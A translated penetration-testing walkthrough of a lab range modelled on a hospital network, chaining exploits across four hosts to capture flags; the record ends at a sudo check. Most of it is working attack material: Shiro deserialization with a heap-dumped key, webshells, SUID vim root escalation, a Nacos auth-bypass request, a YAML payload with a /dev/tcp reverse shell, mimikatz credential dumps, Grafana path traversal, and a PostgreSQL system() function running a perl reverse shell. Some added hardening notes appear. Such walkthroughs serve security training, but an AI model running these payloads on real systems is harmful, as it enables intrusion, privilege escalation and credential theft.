
Target description
In this scenario you play a penetration tester sent to assess a hospital's network. The goal is to gain control of every server and evaluate the organisation's security posture. The range has 4 flags spread across different hosts.
Walkthrough
Entry point: 39.98.119.102
flag1
Port scan with nmap:
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy

Shiro framework fingerprint: the login URL carries the session id rewritten as ;jsessionid=
http://39.98.119.102:8080/login;jsessionid=355D8AE7DBFE75DA739BE3950CFFC37C
Brute-forcing the rememberMe key against the usual key lists failed, so the next guess was an information leak. A directory scan shows Spring Boot Actuator fully exposed:
[08:51:39] 200 - 1KB - /actuator
[08:51:39] 200 - 20B - /actuator/caches
[08:51:39] 200 - 15B - /actuator/health
[08:51:39] 200 - 2B - /actuator/info
[08:51:39] 200 - 749B - /actuator/metrics
[08:51:39] 200 - 74KB - /actuator/beans
[08:51:40] 200 - 53KB - /actuator/loggers
[08:51:40] 200 - 54B - /actuator/scheduledtasks
[08:51:40] 200 - 93KB - /actuator/conditions
[08:51:40] 200 - 20KB - /actuator/mappings
[08:51:40] 200 - 8KB - /actuator/configprops
[08:51:40] 200 - 117KB - /actuator/threaddump
heapdump is exposed as well (fscan later flags it as poc-yaml-spring-actuator-heapdump-file). A heap dump contains every object the JVM held in memory, including Shiro's rememberMe cipher key. Download /actuator/heapdump and feed it to JDumpSpider (JDumpSpider-1.1-SNAPSHOT-full.jar), which searches the heap for known secret holders:

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES
===========================================
Shiro rememberMe deserialization with the recovered key: gadget chain CommonsBeanutilsString, echo via TomcatEcho.
Inject a Behinder (冰蝎) in-memory webshell
Path: http://39.98.119.102:8080/11.ico
Password: 1
Privileges
\\/ >id
uid=1000(app) gid=1000(app) groups=1000(app)
Network configuration
\\/ >ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.30.12.5 netmask 255.255.0.0 broadcast 172.30.255.255
inet6 fe80::216:3eff:fe18:5720 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:18:57:20 txqueuelen 1000 (Ethernet)
RX packets 103637 bytes 82658012 (82.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 67772 bytes 109773230 (109.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 992 bytes 86230 (86.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 992 bytes 86230 (86.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
/home/app/ >cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
ntp:x:108:115::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
_chrony:x:110:121:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
app:x:1000:1000::/home/app:/bin/bash
/home/app/ >ls -al /etc/passwd
-rw-r--r-- 1 root root 1643 Dec 15 2023 /etc/passwd
Privilege escalation to root. Enumerate SUID binaries with find:
/tmp/ >find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
vim.basic is SUID root. The host has outbound access, so first get a reverse shell back to the VPS (for a usable terminal), then use the SUID vim to read the flag directly:
vim /root/flag/flag01.txt
(ASCII-art banner: Hospital)
flag01: flag{0a825299-1495-4293-bd0d-1c8e6b767dcb}
Escalate to a root shell through vim's embedded Python interpreter (the GTFOBins SUID technique). The -p flag stops sh from dropping the effective uid:
#payload
/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
Write an SSH public key into /root/.ssh/authorized_keys for direct root login:
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDrmqoCQun2fFTS3See9e+JEBUH0f5RPddj33czx9NRqeVdidrmkfJxdYaRjRS12P5sQC6b1S8C+EM6dyFgXSnXzrOtfpmZU+Fit5uHWKGyqlRuSbRD015cW9eQ+pM9EfVVXKADabj+Z5F5OGIPtSt/fjsOlZaELHXaLQZjQy5XNyPGgIPvjunRmYN6AYfCA8U2ocX24CLfP+LTbcLVorOzNHwFy5anEc77pAN7YaQLb/8zEt1Gt22DU5dXQ/kxgUl1APgMocmn/e0tConG/Ut/T7z9KwwNvmrc9bINVVTb0qd24Xvq9U15BQ/wREPGRrwmPMymFZQfg8ujNec5tg+Zqp4Bxo8nUex/Zqrd/Zeh1iah9KFKHgV/iqXfwLwCERmSj/6uoexY5HBY8kwgnNNTeotfzTs5Ai+hgqSxCIX99L+GuXDJZSISkCwvwxFsCD9Z4Hes7wnHPHq6MWUP9+Ql/yVjx3iO8GMYB9oueLJ/SeagBjuH7VaddF0GhRakogk=" > /root/.ssh/authorized_keys

flag2
Upload fscan and sweep the /24:
./fscan -h 172.30.12.0/24
[+] Port open 172.30.12.6:445
[+] Port open 172.30.12.6:139
[+] Port open 172.30.12.6:135
[+] Port open 172.30.12.236:22
[+] Port open 172.30.12.5:22
[+] Port open 172.30.12.236:8080
[+] Port open 172.30.12.5:8080
[+] Port open 172.30.12.236:8009
[+] Port open 172.30.12.6:8848
[*] NetInfo
[*] 172.30.12.6
[->] Server02
[->] 172.30.12.6
[*] NetBios 172.30.12.6 WORKGROUP\SERVER02
[*] WebTitle http://172.30.12.5:8080 code:302 len:0 title:None redirect: http://172.30.12.5:8080/login;jsessionid=2D748EA59D57FA47CA88727F87CD871F
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=2D748EA59D57FA47CA88727F87CD871F code:200 len:2005 title:医疗管理后台 (Medical management console)
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964 title:医院后台管理平台 (Hospital back-office platform)
[*] WebTitle http://172.30.12.6:8848 code:404 len:431 title:HTTP Status 404 – Not Found
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file
Get a Meterpreter session and pivot through it. The edge host is reachable from the internet, so a bind payload is used and the handler connects to it:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 39.98.119.102
rhost => 39.98.119.102
msf6 exploit(multi/handler) > set lport 53857
lport => 53857
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 39.98.119.102:53857
[*] Sending stage (3020772 bytes) to 39.98.119.102
[*] Meterpreter session 1 opened (61.139.2.128:42249 -> 39.98.119.102:53857) at 2025-02-02 09:15:00 -0500
Routing table on the edge host:
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 172.30.255.253 100 eth0
172.30.0.0 255.255.0.0 0.0.0.0 0 eth0
172.30.255.253 0.0.0.0 0.0.0.0 100 eth0
Add the route so that msf traffic for 172.30.0.0/16 goes through the session:
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 172.30.12.5
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.30.0.0/255.255.0.0 from host's routing table.
Port 8848 on 172.30.12.6 is Nacos, and fscan flagged the v1 authentication bypass (CVE-2021-29441): Nacos 1.x treats any request whose User-Agent begins with Nacos-Server as inter-node traffic and skips authentication. The user list, including the bcrypt hash of the built-in nacos account, is readable without credentials:
http://172.30.12.6:8848

http://172.30.12.6:8848/nacos

http://172.30.12.6:8848/nacos/v1/auth/users?pageNo=1&pageSize=100
{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}

Now hit the same endpoint, /nacos/v1/auth/users, with POST and the User-Agent header set to Nacos-Server to create a new user:
POST /nacos/v1/auth/users HTTP/1.1
Host: 172.30.12.6:8848
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Nacos-Server
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 21
username=1&password=1
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Date: Sun, 02 Feb 2025 14:25:50 GMT
Connection: close
Content-Length: 52
{"code":200,"message":"create user ok!","data":null}

Logging in to the console as 1/1 works. The configuration centre holds an application configuration (db-config.yaml) with MySQL credentials in plain text and every Actuator endpoint exposed, the same misconfiguration that leaked the heapdump on the first host:

server:
  port: 8080
  servlet:
    context-path: /hello
spring:
  application:
    name: db-config
  cloud:
    nacos:
      discovery:
        server-addr: 127.0.0.1:8848
      config:
        server-addr: 127.0.0.1:8848
        file-extension: yaml
        namespace: dev
        group: DEFAULT_GROUP
        data-id: db-config.yaml
  datasource:
    mysql:
      url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
      username: root
      password: P@ssWord!!!
    redis:
      host: localhost
      port: 6379
management:
  endpoints:
    web:
      exposure:
        include: '*'
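The exposure setting at the bottom of that file is what turns Actuator into an information leak. As an added example (not part of the range or the writeup), the weak setting next to a hardened one; property names are Spring Boot 2.x and the port is an assumption:

```yaml
# Weak, as found in the range: every actuator endpoint (heapdump, env, loggers,
# threaddump, mappings, ...) is served on the application port with no authentication.
management:
  endpoints:
    web:
      exposure:
        include: '*'

---
# Hardened: expose only what operations actually consumes, disable the endpoints
# that hand out secrets outright, and move management traffic to a separate port
# that the perimeter does not forward.
management:
  endpoints:
    web:
      exposure:
        include: health,info          # an explicit allow-list, never '*'
        exclude: heapdump,env,loggers
  endpoint:
    heapdump:
      enabled: false                  # a heap snapshot contains every in-memory secret (here: the Shiro key)
    env:
      enabled: false                  # environment dumps expose datasource passwords and tokens
  server:
    port: 9090                        # assumed value; firewall it off from untrusted networks
```

Even with heapdump disabled, the datasource password in this file sits in plain text in the configuration centre, which is why the Nacos bypass alone was enough to recover it.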
msf was unstable, so the tunnel was switched to venom:
#VPS side: admin connects to the agent listening on the edge host (rhost is the edge host's public IP at the time; it differs from the one used earlier in the writeup)
./admin_linux_x64 -rhost 39.98.109.61 -rport 1111
#edge host: the writeup shows agent.exe; the edge host is Linux, so the matching venom binary would be agent_linux_x64
agent.exe -lport 1111
The intended bug here is YAML deserialization. An application that consumes YAML published through Nacos (the configuration above is a Spring Cloud Nacos client with file-extension yaml) parses it with SnakeYAML, which instantiates arbitrary classes from !! tags. The classic payload (artsploit's yaml-payload) names javax.script.ScriptEngineManager with a java.net.URLClassLoader pointing at an attacker-hosted JAR; ScriptEngineManager loads the JAR and instantiates every ScriptEngineFactory listed in its META-INF/services/javax.script.ScriptEngineFactory, so the factory's constructor runs on the server.
#Edit this constructor to run the command you want, then rebuild the JAR (yaml-payload ships this class plus the META-INF/services file that names it)
#AwesomeScriptEngineFactory.java
// needs: import java.io.IOException; (the class implements javax.script.ScriptEngineFactory)
public AwesomeScriptEngineFactory() {
    try {
        // Runtime.exec(String) splits on whitespace and starts the program directly, with no shell,
        // so "bash -i >& /dev/tcp/..." would hand ">&" to bash as a script name and fail.
        // Run the redirection inside bash -c instead. VPS is a placeholder for the listener host.
        Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/VPS/5000 0>&1"});
        // DNS-out test variant; the same rule applies to the backtick substitution:
        // Runtime.getRuntime().exec(new String[]{"bash", "-c", "ping -c 4 `whoami`.xxx.dnslog.cn"});
    } catch (IOException e) {
        e.printStackTrace();
    }
}
This second-tier host has no internet access, so the JAR is first fetched to the edge host and served from there to the inner host, and a reverse shell to the VPS is not an option. The target turns out to be Windows with the service running at high privilege, so the command is simply to add a local administrator. Note that Runtime.exec() returns immediately; call waitFor() on the first process (and catch InterruptedException) or run both through one cmd /c ... && ..., otherwise the group add can race the user creation:
Runtime.getRuntime().exec("net user gul gOOd@99881 /add");
Runtime.getRuntime().exec("net localgroup administrators gul /add");

Connect over RDP
172.30.12.6
gul
gOOd@99881
Flag:
(ASCII-art banner: Hospital)
flag02: flag{c7c5720f-437f-4371-aaf6-b269933757d2}

flag3
Check the network configuration
#ipconfig
C:\Users\gul>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::7b61:8389:41f5:b2c3%6
   IPv4 Address. . . . . . . . . . . : 172.30.12.6
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 172.30.255.253
Only one NIC, so check whether the host is domain-joined:
#ipconfig /all
C:\Users\gul>ipconfig /all
Windows IP Configuration
   Host Name . . . . . . . . . . . . : Server02
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Ethernet:
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Red Hat VirtIO Ethernet Adapter
   Physical Address. . . . . . . . . : 00-16-3E-24-2A-A1
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::7b61:8389:41f5:b2c3%6(Preferred)
   IPv4 Address. . . . . . . . . . . : 172.30.12.6(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : February 7, 2025 17:50:07
   Lease Expires . . . . . . . . . . : February 5, 2035 17:50:06
   Default Gateway . . . . . . . . . : 172.30.255.253
   DHCP Server . . . . . . . . . . . : 172.30.255.253
   DHCPv6 IAID . . . . . . . . . . . : 100668990
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2F-37-8F-A6-00-16-3E-24-2A-A1
   DNS Servers . . . . . . . . . . . : 100.100.2.136
                                       100.100.2.138
   NetBIOS over Tcpip. . . . . . . . : Enabled
Empty primary DNS suffix and a WORKGROUP machine account: this host is not in a domain. Dump credentials with mimikatz anyway:
Using 'mimikatz.log' for logfile : OK
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords full
Authentication Id : 0 ; 10520639 (00000000:00a0883f)
Session : RemoteInteractive from 2
User Name : gul
Domain : Server02
Logon Server : Server02
Logon Time : 2025/2/7 18:56:25
SID : S-1-5-21-695727081-2069214537-2411057026-1000
msv :
[00000003] Primary
* Username : gul
* Domain : Server02
* NTLM : 49f773f2c9805b2539f28b823d080b6c
* SHA1 : 8ce9673aa15b4e5fedccaaae1bd2a5c3ed83ca8e
* DPAPI : 8ce9673aa15b4e5fedccaaae1bd2a5c3
tspkg :
wdigest :
* Username : gul
* Domain : Server02
* Password : (null)
kerberos :
* Username : gul
* Domain : Server02
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 10483240 (00000000:009ff628)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/7 18:56:23
SID : S-1-5-90-0-2
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 61204 (00000000:0000ef14)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/7 17:50:06
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : Server02$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2025/2/7 17:50:05
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : server02$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 10520610 (00000000:00a08822)
Session : RemoteInteractive from 2
User Name : gul
Domain : Server02
Logon Server : Server02
Logon Time : 2025/2/7 18:56:25
SID : S-1-5-21-695727081-2069214537-2411057026-1000
msv :
[00000003] Primary
* Username : gul
* Domain : Server02
* NTLM : 49f773f2c9805b2539f28b823d080b6c
* SHA1 : 8ce9673aa15b4e5fedccaaae1bd2a5c3ed83ca8e
* DPAPI : 8ce9673aa15b4e5fedccaaae1bd2a5c3
tspkg :
wdigest :
* Username : gul
* Domain : Server02
* Password : (null)
kerberos :
* Username : gul
* Domain : Server02
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 10483488 (00000000:009ff720)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/7 18:56:23
SID : S-1-5-90-0-2
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 10480827 (00000000:009fecbb)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/2/7 18:56:23
SID : S-1-5-96-0-2
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 86737 (00000000:000152d1)
Session : Batch from 0
User Name : Administrator
Domain : Server02
Logon Server : Server02
Logon Time : 2025/2/7 17:50:07
SID : S-1-5-21-695727081-2069214537-2411057026-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : Server02
* NTLM : eb1376a7d71ffa80d65deded1ff6570c
* SHA1 : 0139bb0227272402ddc81de9c8208446d2f3d087
* DPAPI : 0139bb0227272402ddc81de9c8208446
tspkg :
wdigest :
* Username : Administrator
* Domain : Server02
* Password : (null)
kerberos :
* Username : Administrator
* Domain : Server02
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/2/7 17:50:06
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 61180 (00000000:0000eefc)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/7 17:50:06
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 31567 (00000000:00007b4f)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/2/7 17:50:05
SID : S-1-5-96-0-1
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 31539 (00000000:00007b33)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/2/7 17:50:05
SID : S-1-5-96-0-0
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 30513 (00000000:00007731)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/2/7 17:50:05
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : Server02$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2025/2/7 17:50:05
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : server02$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Nothing beyond local accounts. fscan earlier showed another web service:
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964 title:医院后台管理平台 (Hospital back-office platform)
A Java site using fastjson.

One way to recognise fastjson: send the parameter as a JSON body that is unclosed or syntactically broken. The parser throws, the exception text comes back in the response, and it contains the string fastjson.

Version probe (deliberately unclosed JSON):
{"@type": "java.lang.AutoCloseable"
The error message ends with fastjson-version 1.2.45

fastjson 1.2.45 is in the exploitable range. First confirm deserialization with a DNS-out probe: the val of java.net.Inet4Address makes the server resolve the name, and the lookup shows up on the DNSLog domain (pzts1f.dnslog.cn is the author's one-off subdomain):
{"qwq":{"@type":"java.net.Inet4Address","val":"pzts1f.dnslog.cn"}}
With deserialization confirmed, use the Burp plugin and the exp tool to drop a Godzilla (哥斯拉) in-memory shell:
https://github.com/Maskhe/FastjsonScan
amaz1ngday/fastjson-exp: fastjson exploitation with Tomcat and Spring echo and a Godzilla memory shell; the echo chains are dhcp, ibatis and c3p0.

/root/flag >cat f*
(ASCII-art banner: Hospital)
flag03: flag{7d3b59e3-c0e1-4d33-bdd6-a467f8d235dc}
flag4
Two NICs this time; upload fscan and scan the second subnet:
/root/flag >ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.30.12.236 netmask 255.255.0.0 broadcast 172.30.255.255
inet6 fe80::216:3eff:fe24:29d2 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:24:29:d2 txqueuelen 1000 (Ethernet)
RX packets 89969 bytes 121717294 (121.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 22213 bytes 6563074 (6.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.30.54.179 netmask 255.255.255.0 broadcast 172.30.54.255
inet6 fe80::216:3eff:fe24:2917 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:24:29:17 txqueuelen 1000 (Ethernet)
RX packets 1081 bytes 45402 (45.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1099 bytes 46798 (46.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 2875 bytes 244676 (244.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2875 bytes 244676 (244.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
./fscan -h 172.30.54.0/24
[+] Port open 172.30.54.12:5432
[+] Port open 172.30.54.12:3000
[+] Port open 172.30.54.179:8080
[+] Port open 172.30.54.12:22
[+] Port open 172.30.54.179:22
[+] Port open 172.30.54.179:8009
[*] WebTitle http://172.30.54.12:3000 code:302 len:29 title:None redirect: http://172.30.54.12:3000/login
[*] WebTitle http://172.30.54.12:3000/login code:200 len:27909 title:Grafana
[*] WebTitle http://172.30.54.179:8080 code:200 len:3964 title:医院后台管理平台 (Hospital back-office platform)
Set up a proxy for this hop, then browse to Grafana.

Default credentials admin/admin work
- Grafana v8.3.0 (914fcedb7)
Known issues for this version include CVE-2021-43798, unauthenticated arbitrary file read via path traversal under /public/plugins/<pluginId>/. A tool pulls the interesting files (configuration and datasource secrets) in bulk.
Since 172.30.54.0/24 is only reachable from the previous hop, the tool was uploaded to 172.30.12.236 and run from there:
./grafanaExp_linux_amd64 exp -u "http://172.30.54.12:3000/"
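Why the traversal reads arbitrary files, as an added example in Python that models the bug rather than quoting Grafana's Go code: Grafana 8.x served /public/plugins/<pluginId>/<file> by joining <file> under the plugin's directory without confining the result, so "../" segments walk out of it. vulnerable_resolve() reproduces that shape, hardened_resolve() the fix (canonicalise, then refuse anything outside the base), and demo() builds a throwaway directory tree so it runs offline. The plugin id, file names and ini contents are illustrative.

```python
"""
Added example: the path-confinement bug behind CVE-2021-43798, modelled on a
temporary directory tree. Not Grafana's code.
"""
import os
import tempfile


def traversal_request_path(plugin_id: str, target_file: str, depth: int = 10) -> str:
    """Request path for the traversal. It must reach the server verbatim: browsers and
    many HTTP clients collapse '..' before sending (curl needs --path-as-is)."""
    return "/public/plugins/%s/%s%s" % (plugin_id, "../" * depth, target_file.lstrip("/"))


def vulnerable_resolve(plugin_dir: str, requested: str) -> str:
    """Bug shape: join and normalise, never check that the result stays under plugin_dir."""
    return os.path.normpath(os.path.join(plugin_dir, requested))


def hardened_resolve(plugin_dir: str, requested: str) -> str:
    """Fix shape: canonicalise both sides, then require the target to remain inside the base."""
    base = os.path.realpath(plugin_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes plugin directory: %r" % requested)
    return target


def demo() -> dict:
    """Constructed layout: <tmp>/grafana.ini beside <tmp>/public/plugins/alertlist/."""
    root = tempfile.mkdtemp(prefix="grafana-demo-")
    plugin_dir = os.path.join(root, "public", "plugins", "alertlist")
    os.makedirs(plugin_dir)
    with open(os.path.join(root, "grafana.ini"), "w") as f:
        f.write("[security]\nsecret_key = constructed-example-key\n")  # constructed sample
    escape = "../../../grafana.ini"  # alertlist -> plugins -> public -> root

    leaked = open(vulnerable_resolve(plugin_dir, escape)).read()
    try:
        hardened_resolve(plugin_dir, escape)
        blocked = False
    except PermissionError:
        blocked = True
    legit = hardened_resolve(plugin_dir, "module.js")
    return {
        "vulnerable_leaked_ini": leaked.startswith("[security]"),
        "hardened_blocked": blocked,
        "hardened_allows_plugin_file": legit == os.path.join(os.path.realpath(plugin_dir), "module.js"),
    }


if __name__ == "__main__":
    print(traversal_request_path("alertlist", "/etc/grafana/grafana.ini", depth=5))
    print(demo())
```

The check that matters is the one after canonicalisation: normalising the joined path is not enough, because a normalised path that starts with "../" is still outside the base. Whether a real server is affected is then a matter of sending the request without client-side normalisation.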
This yields the PostgreSQL datasource credentials:
postgres:Postgres@123
Connect to the database at 172.30.54.12:5432

#check the server version
select version();
PostgreSQL 8.1.0 on x86_64-unknown-linux-gnu, compiled by GCC gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
#set a password on the database role root (a DB role, not the OS account); it is used later to log in through sudo psql
ALTER USER root WITH PASSWORD '123456';
#create a command-execution function backed by libc's system() (needs superuser, which postgres is). This works only because the server is 8.1: from 8.2 onward the server refuses to load a library without a PG_MODULE_MAGIC block, so libc cannot be used directly and a purpose-built .so is needed
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
#perl reverse shell back to the previous hop (172.30.54.179), the only host this machine can reach
select system('perl -e \'use Socket;$i="172.30.54.179";$p=5200;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');
Shell obtained.

Upgrade to an interactive PTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Privilege escalation is needed; check sudo first:
postgres@web04:/usr/local/pgsql/data$ sudo -l
Matching Defaults entries for postgres on web04:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on web04:
